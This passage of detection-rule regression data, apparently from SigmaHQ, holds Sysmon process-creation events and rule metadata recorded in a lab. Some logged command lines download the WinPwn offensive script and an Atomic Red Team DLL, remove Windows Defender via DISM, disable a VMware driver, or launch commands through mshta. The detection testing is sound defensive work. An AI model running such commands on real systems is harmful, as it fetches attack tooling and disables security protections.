"EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-11T06:41:38.130858Z" } }, "EventRecordID": 21642, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-11 06:41:38.096", "ProcessGuid": "0197231E-67A2-693A-FF12-000000000800", "ProcessId": 9656, "Image": "C:\\Windows\\System32\\curl.exe", "FileVersion": "8.10.1", "Description": "The curl executable", "Product": "The curl executable", "Company": "curl, https://curl.se/", "OriginalFileName": "curl.exe", "CommandLine": "curl -O \"https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1\"", "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", "ParentProcessId": 14736, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml ================================================ id: 68e8f5c3-5a3b-4878-82d3-24d961eb219b description: N/A date: 2025-12-11 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb title: Suspicious File Download From File 
Sharing Domain Via Curl.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-11T06:43:20.070938Z" } }, "EventRecordID": 21651, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-11 06:43:20.052", "ProcessGuid": "0197231E-6808-693A-0413-000000000800", "ProcessId": 17792, "Image": "C:\\Windows\\System32\\curl.exe", "FileVersion": "8.10.1", "Description": "The curl executable", "Product": "The curl executable", "Company": "curl, https://curl.se/", "OriginalFileName": "curl.exe", "CommandLine": "curl --insecure http://example.com", "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", 
"ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", "ParentProcessId": 14736, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml ================================================ id: ef93f624-2b41-41ee-9596-298d3158acfb description: N/A date: 2025-12-11 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec title: Insecure Transfer Via Curl.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-11T06:45:56.284330Z" } }, "EventRecordID": 21680, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-11 06:45:56.239", "ProcessGuid": "0197231E-68A4-693A-0713-000000000800", "ProcessId": 13700, "Image": 
"C:\\Windows\\System32\\curl.exe", "FileVersion": "8.10.1", "Description": "The curl executable", "Product": "The curl executable", "Company": "curl, https://curl.se/", "OriginalFileName": "curl.exe", "CommandLine": "curl --proxy-insecure -p -x http://127.0.0.1:1234 --silent -v --show-error http://127.0.0.1:888/echo", "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", "ParentProcessId": 14736, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml ================================================ id: 11dd9a12-467e-4c13-b928-7c3aea60f59f description: N/A date: 2025-12-11 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 2c1486f5-02e8-4f86-9099-b97f2da4ed77 title: Insecure Proxy/DOH Transfer Via Curl.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { 
"#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-11T06:51:23.281436Z" } }, "EventRecordID": 21706, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-12-11 06:51:23.255", "ProcessGuid": "0197231E-69EB-693A-1313-000000000800", "ProcessId": 13896, "Image": "C:\\Windows\\System32\\curl.exe", "FileVersion": "8.10.1", "Description": "The curl executable", "Product": "The curl executable", "Company": "curl, https://curl.se/", "OriginalFileName": "curl.exe", "CommandLine": "curl file:///C:\\Users\\xodih\\AppData\\Local\\Temp\\calc.dll", "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681", "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800", "ParentProcessId": 14736, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml ================================================ id: 4dfcc9a3-f555-4692-aa17-bca049de2f61 description: N/A date: 2025-12-11 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: aa6f6ea6-0676-40dd-b510-6e46f02d8867 title: Local 
File Read Using Curl.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:23:21.381915Z" } }, "EventRecordID": 8613670, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:23:21.362", "ProcessGuid": "5AA13A44-CF49-68FC-2630-000000004002", "ProcessId": 9032, "Image": "C:\\Windows\\System32\\curl.exe", "FileVersion": "8.13.0", "Description": "The curl executable", "Product": "The curl executable", "Company": "curl, https://curl.se/", "OriginalFileName": "curl.exe", "CommandLine": "curl -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": 
"SHA1=A1BD7848E36F22021C68F4F24EDFDB7ACE42FCA3,MD5=90939B67542D77A32042B7C1945623B1,SHA256=3345339164CF384EFF527B6C3160FEA8D849A4231EC6CA80513E3A739E505168,IMPHASH=6C25E5A258C8C037CD5FBE44B10E696F", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/info.yml ================================================ id: e2254736-78df-48bf-acd9-e36f914e21bc description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 title: Suspicious Curl.EXE Download regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_curl_susp_download/e218595b-bbe7-4ee5-8a96-f32a24ad3468.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/85f520e7-6f5e-43ca-874c-222e5bf9c0de.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2026-01-23T03:54:56.824925Z" } }, "EventRecordID": 23370, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3208, "ThreadID": 1724 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { 
"RuleName": "-", "UtcTime": "2026-01-23 03:54:56.816", "ProcessGuid": "0197231E-F110-6972-3D16-000000000800", "ProcessId": 12132, "Image": "C:\\Program Files (x86)\\Windows Kits\\10\\Tools\\10.0.26100.0\\x64\\devcon.exe", "FileVersion": "10.0.26100.6584 (WinBuild.160101.0800)", "Description": "Device Console", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "DevCon.exe", "CommandLine": "devcon.exe disable \"ROOT\\VMWVMCIHOSTDEV\"", "CurrentDirectory": "C:\\Program Files (x86)\\Windows Kits\\10\\Tools\\10.0.26100.0\\x64\\", "User": "swachchhanda\\xodih", "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000", "LogonId": "0x317fb", "TerminalSessionId": 1, "IntegrityLevel": "Medium", "Hashes": "MD5=36A56121DBE964347C859F95E996B26F,SHA256=282FF232C35FCB82DAD2FDAE56C775523409494B175A5A83D7441B5FA65CB3F9,IMPHASH=A0225EB3236EA941773B705076ADA2AF", "ParentProcessGuid": "0197231E-F0B6-6972-3816-000000000800", "ParentProcessId": 4244, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/info.yml ================================================ id: 00d836cd-522f-41c8-b6a5-e1bf5d1d388d description: N/A date: 2026-01-23 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 85f520e7-6f5e-43ca-874c-222e5bf9c0de title: Devcon Execution Disabling VMware VMCI Device regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_devcon_disable_vmci_driver/85f520e7-6f5e-43ca-874c-222e5bf9c0de.evtx ================================================ FILE: 
regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:41:03.540138Z" } }, "EventRecordID": 8933629, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:41:03.533", "ProcessGuid": "5AA13A44-D36F-68FC-CE30-000000004002", "ProcessId": 5956, "Image": "C:\\Users\\Administrator\\Downloads\\DirLister.exe", "FileVersion": "2.0.0.0", "Description": "DirLister.UI", "Product": "DirLister.UI", "Company": "DirLister", "OriginalFileName": "DirLister.exe", "CommandLine": "\"C:\\Users\\Administrator\\Downloads\\DirLister.exe\"", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=561771830EDE663651F3E6D731656D5D9E2BB19A,MD5=909E97D239C54B4563B61573FAE63C22,SHA256=C939927D7AB06E05B1B6E4951E8F7C45E54BA4EC3CA9399D7E1D9F5CA67C849C,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744", "ParentProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", "ParentProcessId": 7680, "ParentImage": "C:\\Windows\\explorer.exe", "ParentCommandLine": "\"C:\\Windows\\explorer.exe\" /NoUACCheck", "ParentUser": "ATTACKRANGE\\Administrator" } } } 
================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/info.yml ================================================ id: 3e64088e-d05c-4e03-ac62-d5961672d33e description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: b4dc61f5-6cce-468e-a608-b48b469feaa2 title: DirLister Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_dirlister_execution/b4dc61f5-6cce-468e-a608-b48b469feaa2.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T13:44:33.440907Z" } }, "EventRecordID": 8999629, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:44:33.433", "ProcessGuid": "5AA13A44-D441-68FC-E330-000000004002", "ProcessId": 7112, "Image": "C:\\Windows\\System32\\reg.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Registry Console Tool", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "reg.exe", "CommandLine": "reg query 
\"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" /v CurrentBuildNumber", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=E65FAA187D27D84106B78B909C06D405837EC64E,MD5=EB20E119AAF500E2752DC5A588B54C12,SHA256=C6A168C81654F5901E864C8FD61FA54F084CD8B2E0A8AC1B83EACF9EB4484F75,IMPHASH=E23A24F7BA9B35B3E9706724F6749860", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml ================================================ id: 23b1ddfe-cb7d-4e2f-9ae3-d96eabe0f6e1 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 0022869c-49f7-4ff2-ba03-85ac42ddac58 title: System Information Discovery via Registry Queries regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries/0022869c-49f7-4ff2-ba03-85ac42ddac58.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { 
"#attributes": { "SystemTime": "2025-10-25T13:47:34.903176Z" } }, "EventRecordID": 9055342, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-25 13:47:34.894", "ProcessGuid": "5AA13A44-D4F6-68FC-F430-000000004002", "ProcessId": 7808, "Image": "C:\\Windows\\System32\\Dism.exe", "FileVersion": "10.0.20348.2849 (WinBuild.160101.0800)", "Description": "Dism Image Servicing Utility", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "DISM.EXE", "CommandLine": "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet", "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=0AABFEC24BA5FC8806492DCCE89094743219EDE4,MD5=0B1CB657FF6BF807D830A5B970ECC041,SHA256=1B1EC450CE9B4559C6A2AE8ED5D8715F5135BE20257DC84ED11EBB814F29A1F2,IMPHASH=7B40129B2F7F51468E0954D5A44D9CDD", "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", "ParentProcessId": 6304, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/info.yml ================================================ id: b4459771-0fe5-4777-be95-ea6fce92d1fc description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 43e32da2-fdd0-4156-90de-50dfd62636f9 title: Dism Remove Online Package regression_tests_info: - name: Positive Detection Test type: evtx provider: 
Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/process_creation/proc_creation_win_dism_remove/43e32da2-fdd0-4156-90de-50dfd62636f9.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T23:53:43.425641Z" } }, "EventRecordID": 33534161, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-26 23:53:43.425", "ProcessGuid": "5AA13A44-B487-68FE-7F5F-000000004002", "ProcessId": 2052, "Image": "C:\\Windows\\System32\\driverquery.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Queries the drivers on a system", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "drvqry.exe", "CommandLine": "\"C:\\Windows\\System32\\driverquery.exe\"", "CurrentDirectory": "C:\\Windows\\Temp\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461", "ParentProcessGuid": 
"5AA13A44-B487-68FE-7E5F-000000004002", "ParentProcessId": 11360, "ParentImage": "C:\\Windows\\System32\\mshta.exe", "ParentCommandLine": "mshta \"javascript:new ActiveXObject('WScript.Shell').Run('driverquery.exe');close();\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/info.yml ================================================ id: 585f7fa9-392b-4609-b324-4701482de7ec description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd title: Potential Recon Activity Using DriverQuery.EXE regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 1, "Version": 5, "Level": 4, "Task": 1, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T23:47:36.476583Z" } }, "EventRecordID": 33403755, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "UtcTime": "2025-10-26 23:47:36.462", "ProcessGuid": "5AA13A44-B318-68FE-4B5F-000000004002", "ProcessId": 8840, "Image": 
"C:\\Windows\\System32\\driverquery.exe", "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", "Description": "Queries the drivers on a system", "Product": "Microsoft® Windows® Operating System", "Company": "Microsoft Corporation", "OriginalFileName": "drvqry.exe", "CommandLine": "driverquery", "CurrentDirectory": "C:\\", "User": "ATTACKRANGE\\Administrator", "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", "LogonId": "0x529ae3", "TerminalSessionId": 2, "IntegrityLevel": "High", "Hashes": "SHA1=67241EC6E9855CEE71833940C4BB504BB1A50298,MD5=F4D90639E3DA5F6C514495F20AE0322A,SHA256=2202CE439C7DE1CECABA76534B5B7646E0BE585E72E129C86D6B8AFB67F7D212,IMPHASH=033B70299A7F2D13D2CCD201F2FD5461", "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", "ParentProcessId": 10048, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", "ParentUser": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/info.yml ================================================ id: 13b0c2d7-2056-4ce4-85df-79f7e499dd49 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: a20def93-0709-4eae-9bd2-31206e21e6b2 title: DriverQuery.EXE Execution regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon path: regression_data/rules/windows/process_creation/proc_creation_win_driverquery_usage/a20def93-0709-4eae-9bd2-31206e21e6b2.evtx ================================================ FILE: regression_data/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/3bad990e-4848-4a78-9530-b427d854aac0.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": 
